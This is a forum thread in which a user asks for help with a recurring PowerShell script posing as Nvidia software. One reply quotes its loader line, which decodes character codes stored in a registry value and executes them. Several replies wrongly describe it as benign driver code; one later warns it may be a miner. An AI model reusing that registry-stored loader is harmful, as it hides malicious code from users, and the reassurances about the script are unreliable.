Can anyone analyze this script...

Halbour · Dec 2, 2022

It's the one that did me problems- just found out. I edited it, and in that single line of code, it says it's from Nvidia. that and 3 more are randomly appearing, showing in the Task Manager, and doing nothing except wasting RAM.
I hope.
VirusTotal and my Antivirus (Bitdefender, it's a good one) are saying it's totally fine, but I think it's not really- it even appears in the middle of games! here is the file for someone good at this stuff. I'm not good enough.
Here is the file. it was .ps1, but I converted it to txt.

SylverReZ · Dec 5, 2022

You should be fine, there seems to be nothing too malicious about it. Don't know what it does though I'm afraid.

Halbour · Dec 5, 2022

IDK, it just shows 4 PS Windows that dissappear after a few seconds... and take RAM in the Task Manager. Nothing else. But... it's really annoying, to know that the control on my PC isn't mine... and when it decides to show up in the middle of a game- I'm straight up screwed... annoyingly jumps in the middle of my Spider-swings..

Post automatically merged: Dec 5, 2022

M4x1mumReZ said:
You should be fine, there seems to be nothing too malicious about it. Don't know what it does though I'm afraid.

Thank you for answering, though...!

sombrerosonic · Dec 5, 2022

Halbour said:
It's the one that did me problems- just found out. I edited it, and in that single line of code, it says it's from Nvidia. that and 3 more are randomly appearing, showing in the Task Manager, and doing nothing except wasting RAM.
I hope.
VirusTotal and my Antivirus (Bitdefender, it's a good one) are saying it's totally fine, but I think it's not really- it even appears in the middle of games! here is the file for someone good at this stuff. I'm not good enough.
Here is the file. it was .ps1, but I converted it to txt.

Try to delete it, then deep scanning your PC. the PS1 script seems to not be malicious, however better safe than sorry

Halbour · Dec 5, 2022

sombrerosonic said:
Try to delete it, then deep scanning your PC. the PS1 script seems to not be malicious, however better safe than sorry

Already did (with Directory opus's kind help...) so thanks! I think it's gone..?

JaapDaniels · Dec 5, 2022

It doesn't seem to be anything wrong... it looks to be a graphics settings parser towards nvidia through the settings in registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation
I think the global settings will be temporary overwritten for the writer of the script didn't know how else to change those settings.

Halbour · Dec 5, 2022

JaapDaniels said:
It doesn't seem to be anything wrong... it looks to be a graphics ettings parser towards nvidia through the settings in registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation
I think the global settings will be temporary overwritten for the writer of the script didn't know how else to change those settings.

And in English..?

sombrerosonic · Dec 5, 2022

Halbour said:
And in English..?

the PS1 script is apart of your Nvidia Driver AKA your GPU.

Global Settings will be overwritten however

JaapDaniels · Dec 5, 2022

Halbour said:
And in English..?

$variable1=[ScriptBlock]
$variable2=[string]
$variable3=[char]
icm ($variable1::Create($variable2::Join('', ((gp 'HKLM:\SOFTWARE\NVIDIA CorporationNVf6Cb').'VDzb5hT6' | % { [char]$_ })))).
HKLM:\SOFTWARE\NVIDIA Corporation = registry Computer\HKEY_LOCAL_MACHINE\SOFTWARE\NVIDIA Corporation.
i'm not 100% sure what the variables do from icm till gp, but it looks to be legit for a 3D emulator to write to the GPU interpretate $variable1 fixed location or so within the PS1 as overall beïng Scriptblock (naming it this way may help to keep the code easy to read... the same goes for string and char.

Halbour · Dec 6, 2022

sombrerosonic said:
the PS1 script is apart of your Nvidia Driver AKA your GPU.

Global Settings will be overwritten however

IDK I just deleted it lol

sombrerosonic · Dec 6, 2022

Halbour said:
IDK I just deleted it lol

Do command windows still pop up?

Halbour · Dec 6, 2022

sombrerosonic said:
Do command windows still pop up?

It did, but for much shorter, and not showing up on the Task Manager.

sombrerosonic · Dec 6, 2022

Halbour said:
It did, but for much shorter, and not showing up on the Task Manager.

prob a diff script is running, try and see if your on the newist drivers, after you install those drivers, try to see if the windows still pop up

JaapDaniels · Dec 6, 2022

Wait a minute i misread the first part. you mean it's a Powershell script!
For this is mostly console/emulators related i was reading PlayStation 1. Powershell scripts are scripts i'm not sure i'd run outside an bottle if i didn't write it myself and understoot the code.
Though this part looks harmless it runs in elevated priveleges.
You should not try someone elses Powerscript unless you're damn sure what it is.
It could very well be a coin mining application, wich takes about all unused recourses of your computer to mine shit coins for someone else.

Halbour · Dec 8, 2022

JaapDaniels said:
Wait a minute i misread the first part. you mean it's a Powershell script!
For this is mostly console/emulators related i was reading PlayStation 1. Powershell scripts are scripts i'm not sure i'd run outside an bottle if i didn't write it myself and understoot the code.
Though this part looks harmless it runs in elevated priveleges.
You should not try someone elses Powerscript unless you're damn sure what it is.
It could very well be a coin mining application, wich takes about all unused recourses of your computer to mai shit coins for someone else.

The thing is, I never got this script from someone...

sombrerosonic · Dec 8, 2022

Halbour said:
The thing is, I never got this script from someone...

Its prob part of your GPU driver oe utility, if you want, try to reinstall your GPU driver and see what happens

SylverReZ · Dec 8, 2022

I've got the basic Nvidia drivers installed, and it doesn't have the PowerShell script bundled with it.

JaapDaniels · Dec 8, 2022

I've ghot update of lates driver and it's not the driver or related tools of Nvidia.
Powershell is fine if you're writing it for yourself.
Powershell got lots of great options.
But Powershell demands admin mode, even when not strictly needed for the task you give it...
Most of powershell options can be done in python with pip modules without admin rights...
That's far more save.

SylverReZ · Dec 8, 2022

JaapDaniels said:
I've ghot update of lates driver and it's not the driver or related tools of Nvidia.
Powershell is fine if you're writing it for yourself.
Powershell got lots of great options.
But Powershell demands admin mode, even when not strictly needed for the task you give it...
Most of powershell options can be done in python with pip modules without admin rights...
That's far more save.

I'm still using the good ol' Command Prompt and Terminal for everything.

Halbour · Dec 8, 2022

M4x1mumReZ said:
I've got the basic Nvidia drivers installed, and it doesn't have the PowerShell script bundled with it.

It's back now, even after I deleted it

Can anyone analyze this script...

Love yourself

Attachments

The planet is fine. The people are crazy.

Love yourself

Idiot machine

Love yourself

Well-Known Member

Love yourself

Idiot machine

Well-Known Member

Love yourself

Idiot machine

Love yourself

Idiot machine

Well-Known Member

Love yourself

Idiot machine

The planet is fine. The people are crazy.

Well-Known Member

The planet is fine. The people are crazy.

Love yourself

Similar threads

Popular threads in this forum